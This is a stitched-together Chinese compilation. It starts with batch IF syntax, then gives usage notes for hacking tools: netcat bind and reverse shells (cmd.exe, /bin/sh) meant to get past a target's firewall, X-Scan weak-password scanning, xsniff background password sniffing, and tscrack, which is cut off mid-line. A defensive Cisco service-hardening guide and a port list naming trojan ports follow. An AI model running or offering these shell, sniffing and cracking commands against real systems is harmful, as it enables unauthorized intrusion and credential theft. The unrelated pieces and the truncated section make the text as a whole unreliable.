IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:winnt >> d:log.txt 意思是：後台執行dir，並把結果存在d:log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接（多線程）
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使

『玖』 cisco路由器提供一些基於tcp和udp協議的小服務，使用哪些命令可以關閉這些小服務

cisco關閉一些不常用服務

一、Cisco發現協議
CDP是一個Cisco專用協議，運行在所有Cisco產品的第二層，用來和其他直接相連的Cisco設備共享基本的設備信息。獨立於介質和協議。
黑客再勘測攻擊中使用CDP信息，這種可能性是比較小的。因為必須在相同的廣播域才能查看CDP組播幀。所以，建議在邊界路由器上關閉CDP，或至少在連接到公共網路的介面上關閉CDP. www.2cto.com
預設情況下是啟用的。全局關閉CDP，使用no cdp run命令，關閉之後，應該使用show cdp驗證CDP是否已被關閉。
二、TCP和UDP低埠服務
TCP和UDP低埠服務是運行在設備上的埠19和更低埠的服務。所有這些服務都已經過時：如日期和時間(daytime，埠13)，測試連通性(echo，埠7)和生成字元串(chargen，埠19)。
下面顯示了一個打開的連接，被連接的路由器上打開了chargen服務：Router#telnet 192.168.1.254 chargen
要在路由器上關閉這些服務，使用下面的配置：Router(config)#no service tcp-small-serversRouter(config)#no service udp-small-servers
關閉了這些服務之後，用下面方法進行測試，如：Router(config)#telnet 192.168.1.254 daytime
三、Finger
Finger協議(埠79)允許網路上的用戶獲得當前正在使用特定路由選擇設備的用戶列表，顯示的信息包括系統中運行的進程、鏈路號、連接名、閑置時間和終端位置。通過show user命令來提供的。 www.2cto.com
Finger是一個檢測誰登錄到一台主機的UNIX程序，而不用親自登錄到設備來查看。
下面顯示了一個驗證finger服務被打開和如何關閉的例子：Router#telnet 192.168.1.254 finger
(connect 192.168.1.254 finger)Router(config)#no ip fingerRouter(config)#no service finger
當對路由器執行一個finger操作時，路由器以show users命令的輸出來作為響應。要阻止響應，使用no ip finger命令，將關閉finger服務。在較老的版本中，使用no service finger命令。在較新版本中，兩個命令都適用。
四、IdentD
IP鑒別支持對某個TCP埠身份的查詢。能夠報告一個發起TCP連接的客戶端身份，以及響應該連接的主機的身份。
IdentD允許遠程設備為了識別目的查詢一個TCP埠。是一個不安全的協議，旨在幫助識別一個想要連接的設備。一個設備發送請求到Ident埠(TCP 113)，目的設備用其身份信息作為響應，如主機和設備名。
如果支持IP鑒別，攻擊者就能夠連接到主機的一個TCP埠上，發布一個簡單的字元串以請求信息，得到一個返回的簡單字元串響應。
要關閉IdentD服務，使用下面的命令：Router(config)#no ip identd
可以通過Telnet到設備的113埠來進行測試
五、IP源路由
應該在所有的路由器上關閉，包括邊界路由器。可以使用下面的命令：Router(config)#no ip source-route禁止對帶有源路由選項的IP數據包的轉發。
六、FTP和TFTP
路由器可以用作FTP伺服器和TFTP伺服器，可以將映像從一台路由器復制到另一台。建議不要使用這個功能，因為FTP和TFTP都是不安全的協議。
默認地，FTP伺服器在路由器上是關閉的，然而，為了安全起見，仍然建議在路由器上執行以下命令：Router(config)#no ftp-server write-enable (12.3版本開始)Router(config)#no ftp-server enable
可以通過使用一個FTP客戶端從PC進行測試，嘗試建立到路由器的連接。
七、HTTP
測試方法可以使用一個Web瀏覽器嘗試訪問路由器。還可以從路由器的命令提示符下，使用下面的命令來進行測試：Router#telnet 192.168.1.254 80Router#telnet 192.168.1.254 443
要關閉以上兩個服務以及驗證，執行以下的步驟：Router(config)#no ip http serverRouter(config)#no ip http secure-serverRouter#telnet 192.168.1.254 80Router#telnet 192.168.1.254 443
Cisco安全設備管理器(Security Device Manager，SDM)用HTTP訪問路由器，如果要用SDM來管理路由器，就不能關閉HTTP服務。
如果選擇用HTTP做管理，應該用ip http access-class命令來限制對IP地址的訪問。此外，也應該用ip http authentication命令來配置認證。對於互動式登錄，HTTP認證最好的選擇是使用一個TACACS+或RADIUS伺服器，這可以避免將enable口令用作HTTP口令。
八、SNMP
SNMP可以用來遠程監控和管理Cisco設備。然而，SNMP存在很多安全問題，特別是SNMP v1和v2中。要關閉SNMP服務，需要完成以下三件事：
*從路由器配置中刪除默認的團體字元串;
*關閉SNMP陷阱和系統關機特徵;
*關閉SNMP服務。
要查看是否配置了SNMP命令，執行show running-config命令。
下面顯示了用來完全關閉SNMP的配置：Router(config)#no snmp-server community public RORouter(config)#no snmp-server community private RWRouter(config)#no snmp-server enable trapsRouter(config)#no snmp-server system-shutdownRouter(config)#no snmp-server trap-authRouter(config)#no snmp-server
前兩個命令刪除了只讀和讀寫團體字元串(團體字元串可能不一樣)。接下來三個命令關閉SNMP陷阱、系統關機和通過SNMP的認證陷阱。最後在路由器上關閉SNMP服務。關閉SNMP服務之後，使用show snmp命令驗證

九、域名解析
預設情況下，Cisco路由器DNS服務會向255.255.255.255廣播地址發送名字查詢。應該避免使用這個廣播地址，因為攻擊者可能會借機偽裝成一個DNS伺服器。
如果路由器使用DNS來解析名稱，會在配置中看到類似的命令：Router(config)#hostname santa
Router(config)#ip domain-name claus.gov
Router(config)#ip name-server 200.1.1.1 202.1.1.1
Router(config)#ip domain-lookup
可以使用show hosts命令來查看已經解析的名稱。
因為DNS沒有固有的安全機制，易受到會話攻擊，在目的DNS伺服器響應之前，黑客先發送一個偽造的回復。如果路由器得到兩個回復，通常忽略第二個回復。
解決這個問題，要麼確保路由器有一個到DNS伺服器的安全路徑，要麼不要使用DNS，而使用手動解析。使用手動解析，可以關閉DNS，然後使用ip host命令靜態定義主機名。如果想阻止路由器產生DNS查詢，要麼配置一個具體的DNS伺服器(ip name-server)，要麼將這些查詢作為本地廣播(當DNS伺服器沒有被配置時)，使用下面的配置：Router#telnetwww.quizware.com80 (測試)
Router(config)#no ip domain-lookup
Router#telnetwww.cisco.com80
十、BootP
BootP是一個UDP服務，可以用來給一台無盤工作站指定地址信息，以及在很多其他情況下，在設備上載入操作系統(用它來訪問另一個運行有BOOTP服務的路由器上的IOS拷貝，將IOS下載到BOOTP客戶端路由器上)。
該協議發送一個本地廣播到UDP埠67(和DHCP相同)。要實現這種應用，必須配置一個BootP伺服器來指定IP地址信息以及任何被請求的文件。
Cisco路由器能作為一台BootP伺服器，給請求的設備提供快閃記憶體中的文件，因為以下3個原因，應該在路由器閃關閉BootP：*不再有使用BootP的真正需求;*BootP沒固有的認證機制。任何人都能從路由器請求文件，無論配置了什麼，路由器都將作出回復;*易受DoS攻擊。
默認地，該服務是啟用的。要關閉BootP，使用下面的配置：Router(config)#no ip bootp server
十一、DHCP
DHCP允許從伺服器獲取所有的IP地址信息，包括IP地址、子網掩碼、域名、DNS伺服器地址、WINS伺服器地址哈、TFTP伺服器地址和其他信息。Cisco路由器既能作為DHCP客戶端，也能作為伺服器。
在將Cisco路由器作為邊界路由器時，應該設置該路由器為DHCP客戶端的唯一的情形是，如果是通過DSL和線纜數據機連接到ISP，而ISP使用DHCP指定地址信息。否則，決不要將路由器設置為DHCP客戶端。
同樣地，應該設置路由器為一台DHCP伺服器地唯一的情形是，當在一個SOHO環境中使用路由器，在這種小型的網路中基本上這台路由器是可以給PC指定地址的唯一設備。如果這樣做，確保在路由器外部介面上過濾UDP埠67，這將阻止來自外部的DHCP和BootP請求。
一般DHCP伺服器是默認打開的。使用下面的配置關閉：Router(config)#no service dhcp這阻止路由器成為一台DHCP伺服器或者中繼代理

十二、PAD
數據包組合/分拆(packet assembler/disassembler，PAD)用在X.25網路上。以提供遠程站點間的可靠連接。
PAD能給黑客提供有用的功能。假設黑客能獲得直接連接在路由器上的設備的控制權，而如果路由器在運行PAD服務，它將接受任何PAD連接。
要關閉這個服務，使用下面的命令：Router(config)#no service pad
十三、配置自動載入
Cisco路由器啟動時，在出現CLI提示符之前，將經歷幾個測試階段、發現Cisco IOS和配置文件。路由器啟動時，通常會經過以下5個步驟：*載入並執行POST，發現ROM，測試硬體組件，如快閃記憶體和介面;*載入並執行引導自舉程序;*引導自舉程序發現並載入Cisco IOS映像文件。這些映像文件可以來自快閃記憶體、TFTP伺服器或者快閃記憶體;*載入了Cisco IOS之後，發現並執行一個配置文件：配置文件儲存在NVRAM中，但如果NVRAM是空的，系統配置對話框開始，或者路由器使用TFTP來獲取一個配置文件;*給用戶CLI EXEC提示符。
在發現一個Cisco IOS文件時，假定在NVRAM中沒有boot system命令，路由器首先在快閃記憶體中尋找有效的Cisco IOS映像文件。如果快閃記憶體中沒有IOS映像文件，路由器執行TFTP啟動，或者網路啟動;發送本地廣播請求從TFTP伺服器上獲取操作系統文件。如果這個過程也失敗了，路由器從內存中載入IOS映像文件。
因為啟動過程中用到TFTP，而對載入過程沒有安全保護。所以，不應該允許路由器使用該功能。要阻止該功能，使用下面的配置： www.2cto.com
Router(config)#no boot network remote-url-ftp：
[[[//[username：[：password]@]location]/directory]/filename]-rcp：
[[[//[username@]/location]/directory]/filename]-tftp：
[[[//location]/directory]/filename
載入了IOS映像之後，開始發現一個配置文件。如果在NVRAM中沒有配置文件，路由器會使用系統配置對話框來建立配置文件，或使用網路配置選項：使用TFTP廣播來發現配置文件。所以，應該使用以下的命令關閉該特性：Router(config)#no service config
十四、關閉無根據ARP
大多數Cisco路由器(預設情況下)都會向外發送無根據的ARP消息，無論客戶端何時連接並基於PPP連接協商一個IP地址。ARP毒害攻擊主要利用的就是這種ARP消息。
即使客戶端從一個本地地址池收到地址，Cisco路由器也會生成一個無根據的ARP傳送。
禁止無根據ARP傳送，使用下面的命令：Router(config)#no ip gratuitous-arps 十五、關閉IP無類別路由選擇服務
路由器可能會收到一些發往一個沒有網路預設路由的子網的數據包，如果啟用了IP無類別服務時，會將這些數據包轉發給最有可能路由的超網。
要關閉IP無類別路由選擇，在全局配置模式下使用no ip classless命令

『拾』 電腦的埠都有哪些,分別有什麼作用

埠號從1到65535
以下是默認用途的埠，當然也是可以更改的

1 傳輸控制協議埠服務多路開關選擇器
2 compressnet 管理實用程序
3 壓縮進程
5 遠程作業登錄
7 回顯(Echo)
9 丟棄
11 在線用戶
12 我的測試埠
13 時間
15 netstat
17 每日引用
18 消息發送協議
19 字元發生器
20 文件傳輸協議(默認數據口)
21 文件傳輸協議(控制)
22 SSH遠程登錄協議
23 telnet 終端模擬協議
24 預留給個人用郵件系統
25 smtp 簡單郵件發送協議
27 NSW 用戶系統現場工程師
29 MSG ICP
31 MSG驗證
33 顯示支持協議
35 預留給個人列印機服務
37 時間
38 路由訪問協議
39 資源定位協議
41 圖形
42 WINS 主機名服務
43 "綽號" who is服務
44 MPM(消息處理模塊)標志協議
45 消息處理模塊
46 消息處理模塊(默認發送口)
47 NI FTP
48 數碼音頻後台服務
49 TACACS登錄主機協議
50 遠程郵件檢查協議
51 IMP(介面信息處理機)邏輯地址維
52 施樂網路服務系統時間協議
53 域名伺服器
54 施樂網路服務系統票據交換
55 ISI圖形語言
56 施樂網路服務系統驗證
57 預留個人用終端訪問
58 施樂網路服務系統郵件
59 預留個人文件服務
60 未定義
61 NI郵件?
62 非同步通訊適配器服務
63 WHOIS+
64 通訊介面
65 TACACS資料庫服務
66 Oracle SQL*NET
67 引導程序協議服務端
68 引導程序協議客戶端
69 小型文件傳輸協議
70 信息檢索協議
71 遠程作業服務
72 遠程作業服務
73 遠程作業服務
74 遠程作業服務
75 預留給個人撥出服務
76 分布式外部對象存儲
77 預留給個人遠程作業輸入服務
78 修正TCP
79 Finger(查詢遠程主機在線用戶等信息)
80 全球信息網超文本傳輸協議(www)
81 HOST2名稱服務
82 傳輸實用程序
83 模塊化智能終端ML設備
84 公用追蹤設備
85 模塊化智能終端ML設備
86 Micro Focus Cobol編程語言
87 預留給個人終端連接
88 Kerberros安全認證系統
89 SU/MIT終端模擬網關
90 DNSIX 安全屬性標記圖
91 MIT Dover假離線
92 網路列印協議
93 設備控制協議
94 Tivoli對象調度
95 SUPDUP
96 DIXIE協議規范
97 快速遠程虛擬文件協議
98 TAC(東京大學自動計算機)新聞協議
99 Telnet服務,開99埠 (Troj.open99)
101 usually from sri-nic
102 iso-tsap
103 gppitnp
104 acr-nema
105 csnet-ns
106 3com-tsmux
107 rtelnet
108 snagas
109 Post Office
110 Pop3 伺服器(郵箱發送伺服器)
111 sunrpc
112 mcidas
113 身份查詢
114 audionews
115 sftp
116 ansanotify
117 path 或 uucp-path
118 sqlserv
119 新聞伺服器
120 cfdptkt
121 BO jammerkillah
123 network
124 ansatrader
125 locus-map
126 unitary
127 locus-con
128 gss-xlicen
129 pwdgen
130 cisco-fna
131 cisco-tna
132 cisco-sys
133 statsrv
134 ingres-net
135 查詢服務 DNS
136 profile PROFILE Naming System
137 NetBIOS 數據報(UDP)
138 NetBios-DGN
139 共享資源埠(NetBios-SSN)
140 emfis-data
141 emfis-cntl
142 bl-idm
143 IMAP電子郵件
144 NeWS
145 uaac
146 iso-tp0
147 iso-ip
148 jargon
149 aed-512
150 sql-net
151 hems
152 bftp
153 sgmp
154 netsc-prod
155 netsc-dev
156 sqlsrv
157 knet-cmp
158 PCMAIL
159 nss-routing
160 sgmp-traps
161 遠程管理設備(SNMP)
162 snmp-trap
163 cmip-man
164 cmip-agent
165 xns-courier Xerox
166 s-net
167 namp
168 rsvd
169 send
170 network Po
171 multiplex Network
172 cl/1 Network
173 xyplex-mux
174 mailq
175 vmnet
176 genrad-mux
177 xdmcp
178 nextstep
179 bgp
180 ris
181 unify
182 audit
183 ocbinder
184 ocserver
185 remote-kis
186 kis
187 aci
188 mumps
189 qft
190 gacp
191 prospero
192 osu-nms
193 srmp
194 Irc
195 dn6-nlm-aud
196 dn6-smm-red
197 dls
198 dls-mon
199 smux
200 src IBM
201 at-rtmp
202 at-nbp
203 at-3
204 at-echo
205 at-5
206 at-zis
207 at-7
208 at-8
209 qmtp
210 z39.50 ANSI
211 914c/g
212 anet
214 vmpwscs
215 softpc Insignia Solutions
216 CAIlic
217 dbase
218 mpp
219 uarps
220 imap3
221 fln-spx
222 rsh-spx
223 cdc
242 direct
243 sur-meas
244 dayna
245 link
246 dsp3270
247 subntbcst_tftp
248 bhfhs
256 rap
257 set
258 yak-chat
259 esro-gen
260 openport
263 hdap
264 bgmp
280 http-mgmt
309 entrusttime
310 bhmds
312 vslmp
315 load
316 decauth
317 zannet
321 pip
344 pdap
345 pawserv
346 zserv
347 fatserv
348 csi-sgwp
349 mftp
351 matip-type-b
351 matip-type-b
353 ndsauth
354 bh611
357 bhevent
362 srssend
365 dtk
366 odmr
368 qbikgdp
371 clearcase
372 ulistproc ListProcessor
373 legent-1
374 legent-2
374 legent-2
375 hassle
376 nip
377 tnETOS
378 dsETOS
379 is99c
380 is99s
381 hp-collector
383 hp-alarm-mgr
384 arns
385 ibm-app
386 asa
387 aurp
388 unidata-ldm
389 ldap
390 uis
391 synotics-relay
393 dis
394 embl-ndt
395 netcp
396 netware-ip
397 mptn
398 kryptolan
399 iso-tsap-c2
400 vmnet0
401 ups Uninterruptible Power Supply
402 genie Genie Protocol
403 decap
404 nced
405 ncld
406 imsp
407 timbuktu
408 prm-sm
409 prm-nm
410 decladebug DECLadebug Remote Debug Protocol
411 rmt
412 synoptics-trap
413 smsp SMSP
414 infoseek
415 bnet
416 silverplatter
417 onmux
418 hyper-g
419 ariel1
420 smpte
421 ariel2
422 ariel3
423 opc-job-start
424 opc-job-track
425 icad-el
426 smartsdp
427 svrloc
428 ocs_cmu
429 ocs_amu
430 utmpsd
431 utmpcd
432 iasd
433 nnsp
434 mobileip-agent
435 mobilip-mn
436 dna-cml
437 comscm
438 dsfgw
439 dasp
440 sgcp
441 decvms-sysmgt
442 cvc_hostd
443 安全服務
444 snpp
445 NT的共享資源新埠(139)
446 ddm-rdb
447 ddm-dfm
448 ddm-ssl
449 as-servermap
450 tserver
451 sfs-smp-net
453 creativeserver
454 contentserver
455 creativepartnr
456 Hackers
457 scohelp
458 appleqtc
459 ampr-rcmd
460 skronk
461 datasurfsrv
462 datasurfsrvsec
463 alpes
464 kpasswd
465 smtps
466 digital-vrc
467 mylex-mapd
468 photuris
469 rcp
470 scx-proxy
471 mondex
472 ljk-login
473 hybrid-pop
474 tn-tl-w1
475 tcpnethaspsrv
476 tn-tl-fd1
477 ss7ns
478 spsc
479 iafserver
480 iafdbase
481 ph Ph
482 bgs-nsi
483 ulpnet
484 integra-sme
485 powerburst Air Soft Power Burst
486 avian
487 saft
488 gss-http
489 nest-protocol
490 micom-pfs
491 go-login
492 ticf-1
493 ticf-2
494 pov-ray
495 intecourier
496 pim-rp-disc
497 dantz
498 siam
499 iso-ill
500 sytek
501 stmf
502 asa-appl-proto
503 intrinsa
504 citadel
505 mailbox-lm
506 ohimsrv
507 crs
508 xvttp
509 snare
510 fcp
511 passgo
512 exec
513 login
514 shell
515 printer
516 videotex
517 talk
518 ntalk
519 utime
520 efs
521 ripng
522 ulp
523 ibm-db2
524 ncp NCP
525 timed
526 tempo newdate
527 stx
528 custix
529 irc-serv
530 courier
531 conference chat
532 netnews
533 netwall
534 mm-admin
535 iiop
536 opalis-rdv
537 nmsp
538 gdomap
539 apertus-ldp
540 uucp
541 uucp-rlogin
542 commerce
543 klogin
544 kshell
545 appleqtcsrvr
546 dhcpv6-client
547 dhcpv6-server
548 afpovertcp
549 idfp
550 new-rwho
551 cybercash
552 deviceshare
553 pirp
554 rtsp
555 dsf
556 remotefs
557 openvms-sysipc
558 sdnskmp
559 teedtap
560 rmonitor
561 monitor
562 chshell chcmd
563 nntps
564 9pfs
565 whoami
566 streettalk
567 banyan-rpc
568 ms-shuttle
569 ms-rome
570 meter
571 meter
572 sonar
573 banyan-vip
574 ftp-agent
575 vemmi
576 ipcd
577 vnas
578 ipdd
579 decbsrv
581 bdp
588 cal
589 eyelink
590 tns-cml
593 http-rpc-epmap
594 tpip
596 smsd
599 acp Aeolon Core Protocol
600 ipcserver Sun IPC server
606 urm Cray
607 nqs
608 sift-uft
609 npmp-trap
610 npmp-local
611 npmp-gui
613 hmmp-op
620 sco-websrvrmgr
621 escp-ip
625 dec_dlm
626 asia
628 qmqp
630 rda
631 ipp
632 bmpp
634 ginad
635 rlzdbase
636 ldaps
637 lanserver
639 msdp
666 doom
667 disclose
668 mecomm
669 meregister
670 vacdsm-sws
671 vacdsm-app
672 vpps-qua
673 cimplex
674 acap
675 dctp
704 elcsd
705 agentx
709 entrust-kmsh
710 entrust-ash
729 netviewdm1
730 netviewdm2
731 netviewdm3
741 netgw
742 netrcs
744 flexlm
747 fujitsu-dev
748 ris-cm
749 kerberos-adm
750 rfile
751 pump
752 qrh
753 rrh
754 tell send
758 nlogin
759 con
760 ns
761 rxe
762 quotad
763 cycleserv
764 omserv
765 webster
769 vid
770 cadlock
771 rtip
772 cycleserv2
773 submit
774 rpasswd
776 wpages
780 wpgs
786 concert Concert
787 qsc QSC
801 device
873 rsync rsync
886 iclcnet-locate
887 iclcnet_svinfo
888 erlogin
900 omginitialrefs
911 xact-backup
990 ftps
991 nas
992 telnets
993 imaps
994 ircs
995 pop3s
996 vsinet
997 maitrd
998 busboy
999 garcon
1000 cadlock
1010 surf
1023 Reserved
1024 NetSpy.698 (YAI)
1025 network blackjack
1026 Win2000 的 Internet 信息服務
1031 iad2
1032 iad3
1033 Netspy
1042 Bla1.1
1047 GateCrasher
1080 Wingate
1058 nim
1059 nimreg
1067 instl_boots
1068 instl_bootc
1080 Wingate
1083 ansoft-lm-1
1084 ansoft-lm-2
1109 kpop
1114 SQL
1123 murray Murray
1155 nfa Network File Access
1212 lupa lupa
1222 nerv SNI R&D network
1239 nmsd NMSD
1243 Sub-7木馬
1245 Vodoo
1248 hermes
1269 Mavericks Matrix
1492 FTP99CMP (BackOriffice.FTP)
1509 Streaming Server
1524 ingreslock後門
1313 bmc_patroldb
1314 pdps
1321 pip PIP
1345 vpjp VPJP
1346 alta-ana-lm
1347 bbn-mmc
1348 bbn-mmx
1349 sbook Registration Network Protocol
1350 editbench
1352 lotusnote
1353 relief
1354 rightbrain
1355 intuitive-edge
1356 cuillamartin
1357 pegboard
1358 connlcli
1359 ftsrv
1360 mimer
1361 linx
1362 timeflies
1363 ndm-requester
1364 ndm-server
1365 adapt-sna
1366 netware-csp
1367 dcs
1368 screencast
1369 gv-us
1370 us-gv
1371 fc-cli
1372 fc-ser
1373 chromagrafx
1374 molly EPI Software Systems
1375 bytex
1376 ibm-pps
1377 cichlid
1378 elan
1379 dbreporter Integrity Solutions
1380 telesis-licman
1381 apple-licman
1382 udt_os
1383 gwha
1384 os-licman
1385 atex_elmd
1386 checksum
1387 cadsi-lm
1388 objective-dbc
1389 iclpv-dm
1390 iclpv-sc
1391 iclpv-sas
1392 iclpv-pm
1393 iclpv-nls
1394 iclpv-nlc
1395 iclpv-wsm
1396 dvl-activemail
1399 cadkey-licman
1400 cadkey-tablet
1402 prm-sm-np
1403 prm-nm-np
1404 igi-lm
1405 ibm-res
1406 netlabs-lm
1407 dbsa-lm
1408 sophia-lm
1409 here-lm
1410 hiq
1411 af AudioFile
1412 innosys
1413 innosys-acl
1414 ibm-mqseries
1415 dbstar
1416 novell-lu6.2
1417 timbuktu-srv1
1418 timbuktu-srv2
1419 timbuktu-srv3
1420 timbuktu-srv4
1421 gandalf-lm
1422 autodesk-lm
1423 essbase
1424 hybrid
1425 zion-lm
1426 sais
1427 mloadd
1428 inFORMatik-lm
1429 nms Hypercom NMS
1430 tp Hypercom TPDU
1431 rgtp
1432 blueberry-lm
1433 ms-sql-s
1434 ms-sql-m
1435 ibm-cics
1436 saism
1437 tabula
1438 eicon-server
1439 eicon-x25
1440 eicon-slp
1441 cadis-1
1442 cadis-2
1443 ies-lm
1444 marcam-lm
1445 proxima-lm
1446 ora-lm
1447 apri-lm
1448 oc-lm
1449 peport
1450 dwf
1451 infoman
1452 gtegsc-lm
1453 genie-lm
1454 interhdl_elmd
1455 esl-lm
1456 dca
1457 valisys-lm
1458 nrcabq-lm
1459 proshare1
1460 proshare2
1461 ibm_wrless_lan
1462 world-lm
1463 nucleus
1464 msl_lmd
1465 pipes
1466 oceansoft-lm
1467 csdmbase
1468 csdm
1469 aal-lm
1470 uaiact
1471 csdmbase
1472 csdm
1473 openmath
1474 telefinder
1475 taligent-lm
1476 clvm-cfg
1477 ms-sna-server
1478 ms-sna-base
1479 dberegister
1480 pacerforum
1481 airs
1482 miteksys-lm
1483 afs
1484 confluent
1485 lansource
1486 nms_topo_serv
1487 localinfosrvr
1488 docstor
1489 dmdocbroker
1490 insitu-conf
1491 anynetgateway
1492 FTP99CMP (BackOriffice.FTP)
1493 netmap_lm
1494 ica
1495 cvc
1496 liberty-lm
1497 rfx-lm
1498 sybase-sqlany
1499 fhc
1500 vlsi-lm
1501 saiscm
1502 shivadiscovery
1503 imtc-mcs
1504 evb-elm
1505 funkproxy
1506 utcd
1507 symplex
1508 diagmond
1509 Streaming Server
1510 mvx-lm
1511 3l-l1
1512 wins
1513 fujitsu-dtc
1514 fujitsu-dtcns
1515 ifor-protocol
1516 vpad
1517 vpac
1518 vpvd
1519 vpvc
1520 atm-zip-office
1521 ncube-lm
1522 ricardo-lm
1523 cichild-lm
1525 orasrv
1525 orasrv
1526 pdap-np
1527 tlisrv
1528 mciautoreg
1529 coauthor
1530 rap-service
1531 rap-listen
1532 miroconnect
1533 virtual-places
1534 micromuse-lm
1535 ampr-info
1536 ampr-inter
1537 sdsc-lm
1538 3ds-lm
1539 intellistor-lm
1540 rds
1541 rds2
1542 gridgen-elmd
1543 simba-cs
1544 aspeclmd
1545 vistium-share
1546 abbaccuray
1547 laplink
1548 axon-lm
1549 shivahose
1550 3m-image-lm
1551 hecmtl-db
1552 pciarray
1553 sna-cs
1554 caci-lm
1555 livelan
1556 ashwin
1557 arbortext-lm
1558 xingmpeg
1559 web2host
1560 asci-val
1561 facilityview
1562 pconnectmgr
1563 cadabra-lm
1564 pay-per-view
1565 winddlb
1566 corelvideo
1567 jlicelmd
1568 tsspmap
1569 ets
1570 orbixd
1571 rdb-dbs-disp
1572 Chipcom License Manager
1573 itscomm-ns
1574 mvel-lm
1575 oraclenames
1576 moldflow-lm
1577 hypercube-lm
1578 Jacobus License Manager
1579 ioc-sea-lm
1580 tn-tl-r1 tn-tl-r1
1581 mil-2045-47001
1582 msims
1583 simbaexpress
1584 tn-tl-fd2
1585 intv
1586 ibm-abtact
1587 pra_elmd
1588 triquest-lm
1589 vqp
1590 gemini-lm
1591 ncpm-pm
1592 commonspace
1593 mainsoft-lm
1594 sixtrak
1595 radio
1596 radio-sm
